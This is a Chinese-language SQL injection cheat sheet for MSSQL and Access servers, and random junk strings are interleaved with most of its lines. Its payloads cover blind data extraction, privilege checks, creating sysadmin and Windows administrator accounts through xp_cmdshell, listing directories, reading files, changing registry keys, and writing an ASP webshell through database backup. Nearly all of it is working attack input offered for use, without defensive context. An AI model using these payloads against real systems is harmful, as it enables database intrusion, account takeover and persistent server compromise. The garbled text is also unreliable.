1.判断是否有注入;and 1=1 ;and 1=2 {!1n5a3" 1
2.初步判断是否是mssql ;and user>0 Rca
Os
$SzCVWS
3.注入参数是字符'and [查询条件] and ''=' A>t!/_"
zI&4k..4
4.搜索时没过滤参数的'and [查询条件] and '%25'=' zQ5jx5B":
C^" Hj
5.判断数据库系统 O)xEF~DaD
|SP.S 0.y
;and (select count(*) from sysobjects)>0 mssql tnF9Vj[#%_
aE\BAbD7
;and (select count(*) from msysobjects)>0 access ?4>y2!OC9
Bdq"6SK>
Flujwh@rg
k,R~oSA'n
6.猜数据库 ;and (select Count(*) from [数据库名])>0 9LEilmPs
id tQXwa
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 |5IY`;+9
)~.&bEm\
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 Pkx(M E
{,f!'i&b@
9.(1)猜字段的ascii值(access) v^],loi<V
<`xRqe:&9
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 aY[ 0A_
mU+FQX
(2)猜字段的ascii值(mssql) ,AbKxT
f2
:@>br+S
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 Dd#
SUQ
SZ2q}[o`R
10.测试权限结构(mssql) }C{}oLz
6Sb'Otw.
(: TGe v
+:"6`um|
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- *lerPY3 q
^[seK)S=
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- r$r&4dY
k~jKJb-_
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- L_gsG|xX
aC,vh1")F
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- < k+fKl
e.}3OK
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- *mQDS.'AB@
RC8)f8n
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- QFNz9c
^?6
W<
;and 1=(select IS_MEMBER('db_owner'));-- {rb-DB-/5M
q3x;_y^
Q}Ze-JIL$
Ie2w0Cs28
11.添加mssql和系统的帐户 .hQ3A"
=tf@4_
;exec master.dbo.sp_addlogin username;-- [)H,zpl
;exec master.dbo.sp_password null,username,password;-- 11B{gUv.]
O&3r*vd
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- /h7>Z9T
b>bgUDq
;exec master.dbo.xp_cmdshell 'net user username password 2%5^Fi
?79SP p)oo
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- urT/+deR
oBRm\8 2|
;exec master.dbo.xp_cmdshell 'net user username password /add';-- 8tV=fSHd
v#:+n+y\z
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- w%8ooQ|C
Krp
<bK6
Zr.\`mG4f
vNC$f(cQ
12.(1)遍历目录 =wIdC3Ph
Y|m_qB^_
;create table dirs(paths varchar(100), id int) qD(fYOX{C
bIb6yVnHi
;insert dirs exec master.dbo.xp_dirtree 'c:\' u+mjguIv
Q$?7) yyu+
;and (select top 1 paths from dirs)>0 *#Lsjk~_-
G>=9gSLM
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) s<Ex"+
ReI=4Jq11
N?a1sdR
P&[F t)`
(2)遍历目录 NIGB[2V(
mh
A~eJ
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 'ZGT`'ri
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 hF{x')(#l
jU]]:S4xD/
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 `P ^u:
{k_ PMl0G
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树结构 o%V
@D'w
[!J
@a
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 Q?
<-`7
?qf:_G
ch0oFc$
:(bdI]
13.mssql中的存储过程 3 {NaZIk
2?Pt Z
xp_regenumvalues 注册表根键, 子键 Q$xa
Em~7D]Y
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 V17>j0Ev$W
9tzoris[~
xp_regread 根键,子键,键值名 KjFZ
ig{A[7qN
;exec xp_regread iUeV5cB
--in+
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回指定键的值 C2+{U
?(5o@Xq
xp_regwrite 根键,子键, 值名, 值类型, 值 U6c)"^\
gt
=j5
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 XGE
2J
tJUVw=
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 b4Ricm
3)6+1Yc
xp_regdeletevalue 根键,子键,值名 Y%78>-2L
4*0:bhhhf_
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 vnz[w=U
z$9@j2
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 rQ`\JE&`
~A8qeaP
QuSV&>T\
X|X4L(i
14.mssql的backup创建webshell 8O~0RYk
;Ay>+M2O
use model y]yine
F;IP3tD
create table cmd(str image); =LlLE<X"%x
8K|J:[7
insert into cmd(str) values (''); i/NDWVFD
1i4WWK7k
backup database model to disk='c:\l.asp'; tlDYk
f=t:[<
)
O4m(Er@a
rpUy$qrRc
15.mssql内置函数 *,"jF!C&[
LMAmpVo
;and (select @@version)>0 获得Windows的版本号 i~9?:plS
yt. f!"
;and user_name()='dbo' 判断当前系统的连接用户是不是sa qOW#Q:T
3Bejp+xX
;and (select user_name())>0 爆当前系统的连接用户 FXS^^p
P
n%F-cw
;and (select db_name())>0 得到当前连接的数据库 RG&I\DTyt
W0Ktw6
#"::
'?,
tC^ 1}
16.简洁的webshell ^uia`sOP4
A'GlCp
use model |)9thIQF
vwVVBG;t
create table cmd(str image); -^yXLa;D
gdl| ^*tc
insert into cmd(str) values (''); 2R~6<W+&:>
{{32jU7<
backup database model to disk='g:\wwwtest\l.asp';